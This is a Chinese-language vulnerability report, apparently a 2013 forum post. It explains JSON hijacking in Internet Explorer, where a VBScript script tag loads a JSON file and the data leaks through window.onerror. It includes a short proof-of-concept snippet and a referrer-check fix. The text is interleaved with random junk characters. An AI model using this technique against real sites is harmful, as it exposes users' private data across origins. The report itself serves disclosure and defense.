简要描述:
' v& |" {: _" ?6 y. n' K
G$ i5 H# u3 @% I; a& u由于某些资源容器对数据处理不当导致json劫持漏洞.
6 J5 t0 P4 O! i& V; G) u详细说明:4 v$ k2 N' u' V* a
由于ie支持vbscript,所以script元素可以指定成vbscript语言:' x" k0 L, ]$ C, M
<script language=vbscript></script>+ @! p( F# t: u9 R% H3 ~
5 S; y& m% c$ R% m
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.+ U9 R1 E0 k9 r# k
漏洞证明:1 v/ Y; h5 t6 F. e9 ~, F9 k
<script>6 U, _& L3 Y& J
window.onerror=function(_){
c9 }6 v. K9 Y$ lalert(_)$ e& L4 `) d+ f9 Y$ {
}0 w* ^! @4 N7 M0 V/ b
</script>
+ b# g1 | X% }$ k: J; N3 E! ?<script language=vbscript src=1.json></script>
+ f+ {5 m# X! U; q' g , ]! E" m$ [* @2 W' s
- T/ o. _4 O! E1 G2 t- W
1.json:7 n9 L/ t8 [5 |2 T7 k' i% A3 B
[{"name":"sogili","age":19}]
6 C/ M0 \% g8 d2 z& k- x8 e修复方案:
/ [8 P3 f. L0 w+ @! G! Y0 D网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对